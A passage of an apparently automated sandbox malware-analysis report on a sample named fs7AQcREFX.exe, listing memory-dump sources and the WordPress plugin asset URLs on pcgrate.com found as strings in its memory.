00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-table.css?ver=2
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=2.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/css/somdn-style.css?ve
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/js/somdn_script.js?ver
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/dt-the7-core/assets/css/post-type.min.css?ver=2.5.7.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.3
